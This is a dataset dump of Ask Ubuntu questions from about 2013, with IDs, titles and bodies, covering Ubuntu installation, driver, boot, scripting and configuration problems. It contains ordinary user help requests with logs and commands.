389628	how can i fully integrate my windows files with ubuntu using dual boot setup ?	i am totally new to linux/ubuntu . i installed ubuntu 12.04 alongside win7 from a usb stick . i was under the impression that doing this would allow me to access my files from within ubuntu just as i 've always done using windows . however , although i can still access the files easily from the windows partition in the file manager , the files are not fully integrated into my ubuntu environment . i.e . whenever i want to use them , i have to navigate to the windows partition . e.g . i would like to 'import ' my existing music files - which right now are in my music folder in windows - into rhythmbox , to make playlists , etc . but i can not ! the best i can do is navigate to the win partition and open the files individually from there . what i want is for all my files to 'just be there ' for me in ubuntu as they are in windows , without having to always navigate to my windows partition . is there a way to do this ? thanks for any guidance you can give .
389633	xrdb -merge ~/.xresources disables gtk anti-aliasing	when booting into xmonad , gtk fonts are anti-aliased , but for some reason urxvt has problems with variable names in my ~/.xresources ( it fails to parse the variable names as colors and thus everything is pink ) . this is fixed by running xrdb -merge ~/.xresources . however , doing this seems to disable anti-aliasing for fonts in gtk apps , but not in urxvt . what would be causing this ? my ~/.xresources : http : //paste.ubuntu.com/6560111/
389636	invalid argument - brother scanner not working after upgrade ( brscan2 driver )	i recently upgraded ubuntu 13.10 ( saucy ) . scanning via my mfc-420cn had been working in ubuntu and linux mint installs up though olivia and oneric . however once i upgraded from these , scanning broke . i installed a fresh copy of saucy to verify that it was n't just something to do with the upgrade . brother 's website has a notice that all brscan1 models no longer support usb scanning as of ubuntu 11.10 , but it does n't seem to apply for brscan2 and brscan3 models . moreover i found several other posts that seem to indicate at least brscan4 models are currently working . however i have been unable to verify scanners using brscan2 ( or other divers other than brscan4 ) and ubuntu 13.10 ( actually 12.10 and greater ) are currently functioning . for cross-referencing / to help others with the problem the complete list of brscan2 scanners is as follows : dcp-110c dcp-115c dcp-117c dcp-120c dcp-130c dcp-135c dcp-150c dcp-153c dcp-155c dcp-310cn dcp-315cn dcp-330c dcp-340cw dcp-350c dcp-353c dcp-357c dcp-540cn dcp-560cn dcp-7010 dcp-7020 dcp-7025 dcp-750cw dcp-770cw dcp-8060 dcp-8065dn mfc-210c mfc-215c mfc-230c mfc-235c mfc-240c mfc-260c mfc-3240c mfc-3340cn mfc-3360c mfc-410cn mfc-420cn mfc-425cn mfc-440cn mfc-465cn mfc-5440cn mfc-5460cn mfc-5840cn mfc-5860cn mfc-620cn mfc-640cw mfc-660cn mfc-665cw mfc-680cn mfc-685cw mfc-7220 mfc-7225n mfc-7420 mfc-7820n mfc-820cw mfc-845cw mfc-8460n mfc-8660dn mfc-8670dn mfc-885cw mfc-8860dn mfc-8870dw mfc-9420cn similar previously asked questions / problems ( but for brscan3 driver hardware ) : after upgrading to 12.04 the scanner from brother printer mfc-290c does not work xsane exits with `` invalid argument '' while scanning with brother dcp-j725dw , what does it mean ? so far i 've tried : installing sane-utils irections at brother 's website regarding the brscan2 install , including using the dpkg -f flag editing /lib/udev/rules.d/40-libsane.rules to include code : # brother scanners attrs { idvendor } == '' 04f9 '' , env { libsane_matched } = '' yes '' copying files form lib to lib64 : code : cd /usr/lib ln -s ../lib64/libbrscandec2.so.1.0.0 . ln -s ../lib64/libbrcolm2.so.1.0.1 . ln -s ../lib64/libbrcolm2.so . ln -s ../lib64/libbrscandec2.so.1 . ln -s ../lib64/libbrscandec2.so . ln -s ../lib64/libbrcolm2.so.1 cd sane ln -s ../../lib64/sane/libsane-brother2.so.1.0.7 . ln -s ../../lib64/sane/libsane-brother2.so.1 . ln -s ../../lib64/sane/libsane-brother2.so . installing ia32-libs and repeating the sane-utils install removing the 64 bit brscan2 driver and replacing it with the 32 bit one , but results of scanimage with the 32 bit driver set-up for usb or network mode were less than promising : code : # scanimage -l no scanners were identified . if you were expecting something different , check that the scanner is plugged in , turned on and detected by the sane-find-scanner tool ( if appropriate ) . please read the documentation which came with this software ( readme , faq , manpages ) . of the 32 bit windows drivers with wine eumlating win2000 or xp -- it almost completes in 2000 . debugging 64 bit drivers : with brscan2 installed i can open up simple-scan and find the scanner ; moreover scanimage output indicates that everything is okay : # scanimage -l device `brother2 : bus5 ; dev2 ' is a brother dcp-350c usb scanner but scanning ( even as a root user ) still does n't work . > sudo scanimage > image.pnm scanimage : open of device brother2 : bus2 ; dev4 failed : invalid argument xsane produces a similar error : failed to start scanner : invalid argument sane-find-scanner produces a pipe error shown here : http : //pastebin.com/ttnmyd1m but that seems to related to the fact that brother is providing the driver , not sane . i 'm pretty stuck at this point , any help would be appreciated .
389637	jitsi always offline on gmail account	i installed jitsi messenger and added gmail account . however , it simply can not go online . i see it tried to go online and after 1/2s it 's reverted back to offline . is google blocking this app maybe ? what can i do to solve this ?
389638	is there any command line interactive tool like meld ?	i usually work on someone else 's code base on a remote system and often need to merge code from two different files . for that i have to pull files to my system and meld it and push it back to the remote system . is there any better way to do it through the terminal itself ? ( i.e . terminal and command-line equivalent of meld diff viewer ) ?
389644	how do i get this gnome software center app ?	i 've installed gnome 3.8 , and opened the software center . although , i cant seem to find the apps described in this article , such as bijiben and maps . this youtube video shows the software center i 'm looking for . how do i get this app ? also , do i need to upgrade gnome 3.10 , or is it about adding a certain repo ?
389646	eventmachine 0.12.10 installing failed	please check gem_make.out file here : gem_make.out and also the complete process which failed at here : eventmachine fail error file
389655	lubuntu 13.10 ca n't login as keyboard in not being detected	i have just installed lubuntu 13.10 and ca n't log in as my keyboard is not being detected . i have tried using other usb ports , restarting the pc with no luck . i have tried the keyboard on a different pc and works fine so i know its not a fault with the actual keyboard . the screen is a touch screen and the mouse cursor does not go all the way to the top of screen so unable to select any options on the top menu . the keyboard worked fine during installation . has anyone experienced this before and how did you resolve this ? is it a case of a reinstall ?
389659	how to install dlink dfe 520 tx in ubuntu ?	i am a windows user i have installed ubuntu 11.04 in my pc i could not configure ethernet card . lspci is showing ethernet controller : via technologies inc vt6105/vt6106s [ rhine-iii ] ( rev 8b ) so please tell me how to install that card in command prompt
389660	what to do if ubuntu could not display your files in hdd	what to do with this error ? this location could not be displayed . sorry , could not display all the contents of `` harddrive '' : error when getting information for file'/media/user/harddrive/folder ' : input/output error because i need the files in my external hard drive.. thank you .
389662	how do i install ( to dual-boot ) ubuntu on this uefi msi ge40 2oc-218usk laptop ?	i have a ge40 2oc-218usk laptop . i am trying to repartition the hard drive to have it dual boot ubuntu and windows 8 . nothing but endless problems . i 've been progressively turning more and more things off and it still wo n't boot the livecd . i 've tried the following scenarios , booting into the ubuntu 13.10 64-bit livecd and the liveusb with the following options turned off in this order : fail == black screen after moving past the bootloader screen , with any linux turning off secure boot - fail turning off secure boot and intel rapid start technology - fail turning off secure boot , intel rapid start and win 8 fast startup - fail switching from uefi to uefi with csm , with all the other previous stuff still off - fail turning off uefi and switching into legacy mode - it will boot gparted and fedora , but still wo n't boot ubuntu or lubuntu . both *buntus get to the loading screen that says *buntu and has the progress bar made of dots below it and then they just sit there . this is not a tenable option either from what i 've read because windows 8 wo n't boot in legacy mode anyways . i should say , i installed the windows 8.1 upgrade prior to attempting any of this . so it sounds like there are two problems here . the uefi issue and something else preventing it from loading properly even in legacy mode . for the uefi issue , i am trying to get a bios update for this laptop , but msi 's website is poor . i have also heard of a boot manager called refind . will this assist me ? and i do n't know what the problem is with the legacy mode ? perhaps an nvidia issue ? is there a set of boot parameters i can use ? the laptop uses a nvidia gfx controller . any assistance please would be appreciated . i have n't had so much problems putting linux on anything in a long time . edit 2013/12/12 : so i hit escape on the loading screen when booting the ubuntu livecd in legacy mode and it showed the stack trace off the kernel panic during boot it is the following below . it seems to indicate a problem with the nouveau kernel module during livecd boot . anyone know what the right kernel parameters that i should with this are ? : [ 26.154100 ] divide error : 000 [ # 1 ] smp [ 26.154179 ] nouveau e [ pbus ] [ 000:01:00.0 ] mmio write of 0x00000000 fault at 0x418880 [ ibus ] [ 26.155172 ] modules linked in : btrfs ( f ) raid6_pq ( f ) libcrc32c ( f ) zlib_deflate ( f ) xor ( f ) x86_pkg_temp_thermal coretemp kvm_intel ( f ) kvm ( f ) crct10dif_pclmul ( f ) crc32_pclmul ( f ) ghash_clmulni_intel ( f ) joydev ( f ) snd_hda_codec_hdmi aesni_intel ( f ) snd_hda_codec_realtek aes_x86_64 ( f ) lrw ( f ) gf128mul ( f ) glue_helper ( f ) msi_wmi snd_hda_intel ablk_helper ( f ) cryptd ( f ) snd_hda_codec sparse_keymap snd_hwdep ( f ) snd_pcm ( f ) snd_page_alloc ( f ) snd_seq_midi ( f ) snd_seq_midi_event ( f ) arc4 ( f ) dm_multipath ( f ) rts5139 ( c ) snd_rawmidi ( f ) rt18723ae rtl_pci rtlwifi scsi_dh ( f ) mac80211 snd_seq ( f ) snd_seq_device ( f ) snd_timer ( f ) cfg80211 snd ( f ) soundcore ( f ) btusb mei_me lpc_ich mei psmouse ( f ) serio_raw ( f ) mac_hid intel_rst microcode ( f ) parport_pc ( f ) ppdev ( f ) lp ( f ) parport ( f ) bnep rfcomm bluetooth squashfs ( f ) overlayfs ( f ) nls_iso8859_1 ( f ) dm_mirror ( f ) dm_region_hash ( f ) dm_log ( f ) usb_storage ( f ) nouveau i915 ttm i2c_algo_bit ahci ( f ) drm_kms_helper libahci ( f ) drm alx mdio mxm_wmi wmi video ( f ) [ 26.158381 ] cpu : 5 pid : 2346 comm : xorg tainted : gf c 3.11.0-12-generic # 19-ubuntu [ 26.159108 ] hardware name : micro-star international co. , ltd. cr42 2m/ge40 2oc/ms-1492 , bios e1492ims.10n 11/14/2013 [ 26.159840 ] task : ffff880221358000 ti : ffff880222810000 task.ti : ffff880222810000 [ 26.160556 ] rip : 0010 : [ < ffffffffa0206cb0 > ] [ < ffffffffa0206cb0 > ] nve4_graph_init+0x250/0x7e0 [ nouveau ] [ 26.161322 ] rsp : 0018 : ffff880222811c10 eflags : 00010246 [ 26.162069 ] rax : 00000000007fffff rbx : 0000000000000000 rcx : 0000000000000000 [ 26.162808 ] rdx : 0000000000000000 rsi : ffffc90016303018 rdi : 0000000000000000 [ 26.163563 ] rbp : ffff880222811ce8 r08 : 0000000000000007 r09 : 0000000000000000 [ 26.164314 ] r10 : 000000000000902d r11 : ffff88021e234000 r12 : ffff88021e234000 [ 26.165055 ] r13 : ffffffffa0270080 r14 : 0000000000000000 r15 : ffff88021e2340eb [ 26.165794 ] fs : 00007f277c762980 ( 0000 ) gs : ffff88022fb40000 ( 0000 ) knlgs:0000000000000000 [ 26.166549 ] cs : 0010 ds : 0000 es : 0000 cr0 : 0000000080050033 [ 26.167300 ] cr2 : 00007f27760d2f50 cr3 : 0000000222fa9000 cr4 : 00000000001407e0 [ 26.168013 ] stack : [ 26.168756 ] ffff880222811c20 0000000000000000 0000000000000000 0000000000000000 [ 26.169521 ] 0000000000000000 0000000000000000 0000000000000000 0000000000000000 [ 26.170280 ] 0000000000000000 0000000000000000 0000000000000000 0000000000000000 [ 26.171032 ] call trace : [ 26.171805 ] [ < ffffffffa01b1fad > ] nouveau_object_inc+0xbd/0x1b0 [ nouveau ] [ 26.172574 ] [ < ffffffffa01b2170 > ] nouveau_object_new+0xbd/0x230 [ nouveau ] [ 26.173353 ] [ < ffffffffa0213730 > ] nouveau_abi16_ioctl_grobj_alloc+0x70/0xe0 [ nouveau ] [ 26.174136 ] [ < ffffffffa0030212 > ] drm_ioctl+0x532/0x660 [ drm ] [ 26.174920 ] [ < ffffffff816f06a4 > ] ? __do_page_fault+0x204/0x540 [ 26.175727 ] [ < ffffffff8116e9d5 > ] ? do_mmap_pgoff+0x305/0x3c0 [ 26.176522 ] [ < ffffffff811b8ba5 > ] do_vfs_ioctl+0x2e5/0x4d0 [ 26.177317 ] [ < ffffffff811b8e11 > ] sys_ioctl+0x81/0xa0 [ 26.178116 ] [ < ffffffff816f521d > ] system_call_fastpath+0x1a/0x1f [ 26.178923 ] code : 7d 11 89 f8 c1 f8 03 48 98 44 8b 84 85 30 ff ff ff eb a0 8b bd 30 ff ff ff 8d 83 ff ff 7f 00 45 31 f6 4d 8d bc 24 eb 00 00 00 99 < f7 > fb bb 14 09 50 00 8d b0 80 89 41 [ 26.180694 ] rip [ < ffffffffa0206cb0 > ] nve4_graph_init+0x250/0x7e0 [ nouveau ] [ 26.181584 ] rsp < ffff880222811c10 >
389665	converting an arf file using nbr2mp4 with kubuntu 13.10	i followed the nbr2mp4 converter procedure on the webex site and also reviewed the step-by step instructions at http : //askubuntu.com/a/362719/219130 but no matter what i do , it just does n't work ( i.e . does n't output any mp4 file ) . from within the nbr2_mp4 directory : $ ./nbr2mp4 my_file.arf /tmp/ 5 converting /home/username/nbr2_mp4/my_file.arf to /tmp/my_file.mp4 retrieving video data , fps=5 ... i tried many different options with or without dest and fps , with and without sudo , and whatever i do , it just does n't output any file , ever . on the webex site it says linux os : 32-bit ubuntu 8.10/9.04 so it might simply be that the scripts are incompatible with 13.10 , but i 'd rather know if others have the same issue too ?
389667	what is the difference between a desktop environment and a shell ?	i may be asking a basic question for many of you . what is exactly linux environment ? and what the relation between linux environment and shell ? and what the relation between linux environment and running processes ? sorry if my question makes no sense !
389670	unable to install vlc noob question kubuntu	whenever i type sudo apt-get install vlc . it comes with an error saying that unable to locate the package this is happening with all other installs too , am i making any mistake , it is my first hour with kubuntu .
389676	django model to manipulate ldap entry	i am currently working on a project involving django framework and openldap . but i ran into a problem . in my ldap database , i have a entry named accounts , with the following attributes : dn : ou=accounts , dc=example , dc=ro objectclass : groupofnames objectclass : top cn : accounts member : cn=test1 , ou=accounts , dc=example , dc=ro member : cn=test2 , ou=accounts , dc=example , dc=ro member : cn=test3 , ou=accounts , dc=example , dc=ro ... ( and so on , about 10 test users ) in order to manipulate my ldap entries from django models , i use django_ldapdb python package . in models.py file in django i defined the following things : class ldapentry ( ) : base_dn = `` ou=accounts , dc=example , dc=ro '' object_classes = [ `` groupofnames '' ] group_name = charfield ( db_column= '' cn '' , primary_key=true ) member_attribute = charfield ( db_column= '' member '' ) # methods for displaying the group name ( __str__ & __unicode__ ) after that , i open up a django shell , and start playing around with some queries : # this returns a instance for the accounts group group = ldapentry.objects.get ( group_name = `` accounts '' ) # then i try to see the members that are part of this group group.member # and this returns the following thing : u'cn=test1 , ou=accounts , dc=example , dc=ro' after noticing this , i realize that the member field , in my django model , has information about only the first member attribute in my ldap accounts entry , in ldap database . what i want to ask is : is there a possible way in which i can tell a django model field to hold multiple values ? ( i want my `` member '' field to hold information about all the member in account group , basically holding all the distingueshed names of the users ) . thank you very much .
389677	ctrl + super + right key combination not working	i have recently installed 64-bit ubuntu 12.04 and i ca n't get ctrl+super+right key combination to work ( ctrl+super+left works as it should ) . moreover , same combination but with using right arrow key from numpads is working for same purpose . it is also happening on a few other computers and i do n't know how to fix it . at the same time any other combination including right arrow works . what to do ?
389678	cpu stuck on minimum frequency after resume from suspend and unplugged ( dell latitude e6540 )	i have a dell latitude e6540 ( 4th gen. core i7 processor ) . when i resume from suspend , while on battery , the processor never scales frequecy up and stays at minimum frequency ( 800 mhz ) . does this problem affect anyone else ? is there a workaround ( other than plugging the ac charger when resuming ) ? i 've submitted a bug report in launchpad ( https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1260112 ) . i 'm on ubuntu 13.10 64 bit . thanks in advance !
389679	edimax rtl driver says : `` this driver is activated but not currently in use ''	i am trying to update a driver for edimax usb wifi device , and after the unzip/install complete i go to the additional drivers dialog and see the line : `` realtek wireless lan driver '' but on the bottom of the screen i see the line says : '' this driver is activated but not currently in use '' what can i do to make the system use it ? thanks in advance roman .
389680	standard font xterm	i was wondering what the standard font of xterm is . also what 's the right way to change it ? i 've read some options , but i also want to know what the default font is and how to find out .
389681	ape + cue in rhythmbox	i can open ape file in my rhythmbox and it plays ok . but it does n't fetch cue file , so i ca n't see songs list , only one line in the player with huge duration . what should i do to configure rhythmbox ? files : cd1.ape and cd1.cue cue text : ... file `` cd1.ape '' wave ...
389682	black screen problems on ubuntu 13.10 after login	i have upgraded my ubuntu 13.04 to 13.10 and after restarted it works properly to login page then after login i got there 's a black screen with crusors . my computer specs : processor- intel ( r ) core ( tm ) i5-3210m cpu @ 2.50ghz 2.50ghz installed memory- 4.00 gb ( 3.86 usable ) graphics card : nvidia getforce gt 630m
389683	how we can change linux environment variable in python ?	let 's say we are on a command line and we declare an environment variable : export x=100 when i go to python and type : os.environ [ 'x ' ] = '100000' if i came back to command line x stays 100 . is there any way to change this variable in python ?
389685	make ubuntu search by default in all categories ?	i am using ubuntu 13.10 . every time i want to search for something using the super key , unity has set its search category ( filter ) for videos ( nothing else ) , although i chose the last times to look for other categories like apps or documents . but ubuntu changed my choice and enabled only searching for videos . every time i want to search for something on my computer , i have to enable all filters . it is annoying ! is there a way to make ubuntu search by default in all categories ?
389686	gpg error without missing keys on synaptic	i have installed ubuntugnome 13.10 and gnome-shell 3.10 on my notebook . i have added about 30 ppas normally . if i do n't add any other ppa the update runs perfectly . if i add even one more ppa , the update shows gpg errors . is there a limit to number of ppas in ubuntu ?
389688	i changed my password to none and now i cant authenticate nor even cant do sudo ?	i have admin rights . could there be a way to change back my pass . i dont even know whats my password is because i already set it to `` none ' now its very hard to install apps . need help please ! fast .
389690	problem installing ubuntu on lenovo ideapad u330p	i can not get ubuntu 13.10 64-bit iso installed on a lenovo ideapad u330p ( i5 core , ssd ) preinstalled with windows 8 , by using a ubuntu usb live stick . i tried various live usb creators ( the build-in one crashes , but the rest live usb creator , mkusb script , etc work ok ) . i tried also with various uefi / secure boot options in bios ( no secure boot , no uefi = legacy ) , with no luck . i tried also with efi , and without the efi folder on the usb and legacy bios install , no luck . the most i can achieve is to get the ubuntu live usb first screen with the ubuntu options shown , but then with any option i choose ( try , or install ) after a few seconds i am left with a black screen , and nothing happens , no matter how much i wait . i have then to power off the machine . i am not sure this is related to uefi , but it does not seem like . does anyone has any experience with this type of machine - lenovo ideapad u330p ? preferably , i would like to get rid of the preinstalled copy of windows 8 completely and install only ubuntu there ( i do not want a dual-boot system , but i can live with dual-boot system if than is the only way ) . any install mode ( legacy or uefi , mbr / gdi ) will do . update : some details ( i have read all relevant ubuntu/uefi related links here , and in ubuntu wiki ) : i disabled win8 fast boot and hibernate i have disabled secure boot i tested with uefi and also with disabled uefi ( legacy ) i tried with ubuntu usb with efi folder , and renamed efi folder i tried with various programs to create the ubuntu usb with some of these combinations it does not work , but with uefi and secure boot disabled - i see the grub-like menu , and without uefi at all i see the boot screen with options . however , no matter what option i choose , it freezes ( screen becomes black after one second or so after that ) , and only the power off button works . some people say this is graphics driver issue ( for other models ) - but would be nice to know if someone has any experience with my model . some of the links i read : https : //help.ubuntu.com/community/uefi installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) http : //elabualg.wordpress.com/2013/10/22/dual-boot-ubuntu-and-windows-8-uefi/ uefi boot results in a black screen dual boot problem , black screen during the ubuntu boot uefi 13.04 install on lenovo ideapad y510p boots windows instead
389692	how can i use grep to find ipv4 number in a pcap file with regx syntac ?	i 'm new in ubuntu . i have this ip regex '\b ( ( 25 [ 0-5 ] |2 [ 0-4 ] [ 0-9 ] | [ 01 ] ? [ 0-9 ] [ 0-9 ] ? ) ( \.| $ ) ) { 4 } \b' i have a network pcap file , i want to use this regex and the grep -e to find all ip address in the file . i tried : egrep ' [ [ : digit : ] ] { 1,3 } \. [ [ : digit : ] ] { 1,3 } \. [ [ : digit : ] ] { 1,3 } \ . [ [ : digit : ] ] { 1,3 } ' -f ncapture.pcap how can i use the grep command to find ip in a network pcap file ?
389693	problems changing contents of bashrc ?	i have installed ns2 ( using ubuntu 13.04 ) tried to update path and library path using command gedit .bashrc but getting the following error . ** ( gedit:3732 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-unpdnfjm8m : connection refused . ( gedit:3732 ) : eggsmclient-warning ** : failed to connect to the session manager : none of the authentication protocols specified are supported . can you help ?
389694	how to get response from ssh command using expect	currently i am using following code , # ! /usr/bin/expect -- set timeout 60 set username [ lindex $ argv 0 ] set password [ lindex $ argv 1 ] set ip [ lindex $ argv 2 ] spawn ssh $ username @ $ ip expect { `` *yes/no* '' { send `` yes\r '' } `` ? assword : '' { send `` $ password\r '' } } expect `` > '' send `` en\r '' expect `` # '' send `` con t\r '' expect `` ( config ) # '' send `` show interf\r '' interact i have following results in terminal , interface abcdefgh status : comment : admin up : xxx link up : xxx dhcp running : xx ip address : 00.00.00.000 /00 netmask : 255.255.255.0 ipv6 enabled : no speed : 1000mb/s ( auto ) duplex : full ( auto ) interface type : abcdefgh mtu : 0000 hw address : xx : xx : xx : xx : xx : xx now i want to read hw address , as i am using expect for automation , is there any method for this . thanks
389695	server motd does not appear on local login	i just loaded ubuntu server 13.10 and notice that when i log into the sever i do not get a motd but when i ssh into server with the same login passwd i do get the motd . i would like to get it all the time even when i login from the local keyboard . where am i going wrong thanks
389696	passphrase in thunderbird with enigmail 1.6	i am using ubuntu 13.10 . two days ago i installed enigmail 1.6 for thunderbird . it works ! unfortunately i have to type in my passphrase everytime i receive or send an encrypted mail . is there a way that thunderbird gets the passphrase automatically and i do n't need to enter the passphrase again when i receive or send an encrypted mail ? thank you ! new ubuntu user
389704	how to map network drive	i need to if it 's possible to map a network drive through ubunto and make it remain in my comp even if restarted or logged off `` as in windows we map network drive through the following options ( profile home folder in active directory , or by running script net use ) ``
389705	what do these vi commands do ?	the first one is : . , +15s/first/second/g i know that the . simply repeats the last operation but i 'm not familiar with the rest of it . the other vi command i would like to know is : 10yy ( followed by ) p
389710	rosetta stone with wine	i am using ubuntu 13.10 and playonlinux 4.0.14 i want to install rosetta stone on my system . everything is working with wine , but rosetta stone does not detect the mounted language packages . i mounted them with furius . what can i do that rosetta stone is recognizing the mounted language packages ? thank you ! new ubuntu user
389711	searching for wifi connections	i have just installed lubuntu on a friend 's laptop . i have entered the wifi/router settings into network connections but i am unable to search to find wifi networks . when i installed lubuntu on my personal laptop i just left clicked the mouse on the wifi symbol ( upside down triangle ) in the bottom left of the task bar and various wifi networks appeared in the search . the wifi led is showing ok .
389712	unity not working since nvdia graphic driver installed	i am using ubuntu 13.04 . my computer has the below graphic card : jatin @ jatin-hp-pavilion-dv6-notebook-pc : ~ $ lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati seymour [ radeon hd 6400m/7400m series ] [ 1002:6760 ] i do not have nvidia graphic card installed . given that i have to program on nvidia cuda , i installed its drivers and setup from here ( atleast so that i could compile the programs and run it on aws ) . for some reason since i have installed it , my unity has broken . i.e . only the desktop is shown without all the panels , launcher bar etc . i have tried every solution on the net since a day and have been unsuccessful ( reinstall unity , ccms and enabling unity plugin etc etc ) . i am a ubuntu novice , but i think installing nvidia graphic driver might have done something weird . can someone please help on how to get my unity working well . ( if i run ubuntu in gnome fallback mode , it runs perfectly well ) ps : i do not know if the below is helpful , but i found it to be weird : on doing setsid unity , it shows this : compiz ( core ) - error : plugin 'opengl ' not loaded . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - info : loading plugin : grid compiz ( core ) - info : starting plugin : grid xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 compiz ( core ) - info : loading plugin : session compiz ( core ) - info : starting plugin : session xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . moreover , when i enable unity plugin by doing ccms . it gets enabled but on restarting ccms , it gets unselected again .
389715	how to list installed package and its details on ubuntu ?	i am new to ubuntu and trying to find out the way to list all installed packages and its details like version , release , install time , category on ubuntu . found that following commands will help me get some of this information : 1 ) dpkg -l 2 ) dpkg-query -w -f= ' $ { packagespec } \t $ { version } \t $ { description } \n' unlike redhat the install time and category information is missing in this . can anyone know of a way to retrieve these details ? thanks in advance .
389720	nvidia geforce gtx 765 ubuntu 12.04	i cant find a driver for this gpu that does n't crash my ubuntu . when i update it to vs 319 , the screen goes black and i have to either completely wipe the partition and start over or purge it and manually install a much older version . what update is compatible ?
389723	longhaul : option `` enable '' not set . aborting	i 'm trying to run 12.04 lts for the first time , after installation is complete but , always appears the following abort message when starting ubuntu [ ... number ... ] longhaul : option `` enable '' not set . aborting and i ca n't find what to do to solve it how to fix this issue ?
389728	how can i configure apt-get to clean automatically after every install	is there any way do apt-get clean after apt-get install automatically , like in other distros ?
389729	installing and configuring turn stun server	i am new to this and i need help setting up my turn and stun server properly on ubuntu ubuntu 12.04 with different configuration options . any help is most welcome .
389733	disabling discrete nvidia card on asus r501vb on 13.10 saucy , vgaswitharoo or bumblebee ?	i have a asus r501vb-s3116d with intel速 hd graphics 4000 and nvidia gt 740m ( gk107 - 128bit ) i am trying to disable the nvidia card in ubuntu 13.10 saucy and no , i do not have a option to turn off optimus technology in bios . so far browsing forums and reading tutorials i 've managed to get here with vgaswitcharoo : echo on > /sys/kernel/debug/vgaswitcheroo/switch echo igd > /sys/kernel/debug/vgaswitcheroo/switch echo off > /sys/kernel/debug/vgaswitcheroo/switch output : **0 : igd : + : pwr:0000:00:02.0 1 : dis : : off:0000:01:00.0** this in turn reduces the core temperatures from 57-60 to 49-51 the guide i am following says : vga_switcheroo is likely not going to work on these kind of machines . most optimus laptops do not have a hardware multiplexer does this mean the i am one of the lucky ones and this actually worked and there is no need for further hassle ? does this mean that it 's not necessarily turned off and i still need to turn to bumblebee ? if everything is ok and i do not need to do anything else why is skype crashing when i launch it with discrete card turned off error : http : //s22.postimg.org/5gkjze2s0/20131212_144414.jpg 4.why is the script in the tutorial to shut down the nvidia card at boot give this error : /scripts/local-top/hybrid_boot_options : line 62 : ca n't create /sys/kernel/debug/vgaswitcharoo/siwtcharoo : nonexistent directory
389735	how can i customize my ubuntu to look like windows	how can i customize my ubuntu 12 to look like windows
389739	stating the hard link count for file after each of the following commands ?	assume you have a file called file1 that has a hard link count of 1 . state the hard link count for file1 after each of the following commands . also give a brief explanation of why the hard link count changed or stayed the same : a. ln âs file1 file2 b. ln file1 file3 ; ln file2 file4 ; ln file3 file5 c. rm file4 ; rm file3 ; rm file2 all i am aware of is that ln creates links between files : s
389742	how to open a powerpoint presentation in ubuntu ?	i have received a few xmas cards using powerpoint . is their an ubuntu equivalent to open this file ?
389747	setting up dell xps 14 ultrabook for dual boot	i 've just bought an xps 14 ultrabook with windows 8 and i 'd like to set up dual boot with the latest lts ubuntu , however i can not figure out how to do it from a usb drive ! i 've seen this question but it does n't explain how i should set up the boot section of my bios , legacy or uefi etc . when i go into boot options at start up i do n't see usb as an option - if i go into bios and switch from uefi to legacy and then go into my boot menu and select usb ( now an option ) , i get an error . i 've read that i should n't even need to use legacy but its the only way to get the usb boot option . i really need an idiots guide ! i 've dual booted before from a usb on other windows pcs but this has me stumped - and i really do n't want to be stuck with windows 8 ! i hope someone can help , thanks .
389752	can not burn or use ubuntu images on mac	i 'm trying to get a version of ubuntu running on my old intel mac . however , my computers think all of the disc images i 've tried so far ( downloaded from ubuntu.com , i 've tried 32-bit versions of 12.04 , 12.10 , and 13.10 ) are invalid ( when i try to open the disc image i get an error `` no mountable file system '' ) and when i burn them using disk utility ( following the instructions here precisely ) , they make unreadable discs . there are already a few questions around this issue here , but none of them give any information about what to do ( most answers assume the questioner is n't aware of the burn instructions or has n't followed them ; i have ) . i 've seen some mention of `` mac-specific '' images , but i only see 64-bit mac images and the computer i want to install it on ( a 1.83ghz core duo from ~2006 ) is far , far too old for that . how can i burn a working install dvd ?
389753	is there an ubuntu driver for a trendnet tew 684ub wireless wifi adapter	i have no network here , does anyone know where i can download this driver under windows , so that i can install it in ubuntu . thanks .
389754	telnet session already in use , unable to create session	i have created a telnet session and without exiting properly i closed terminal window . now i am unable to connect again and can not make telnet session with appliance . i am getting following error message at console . error message this connection is in use . user ( s ) currently connected : none @ 99 . you need privilege to make a simultaneous session . connection closed by foreign host . how can i close previous session which was created , or how can i overcome this issue .
389757	removing windows 8 syskey encryption password	i 've been trying to achieve this for a while now : http : //computernetworkingnotes.com/xp-tips-and-trick/remove-administrator-password.html however i am running windows 8 , and i 'm not sure this would work . can i use ubuntu to fix . thanks in advance
389764	error : could not find kde4 kde4-config	when i tried to install kdbg this error appeared . ubuntu 12.04 is my version .
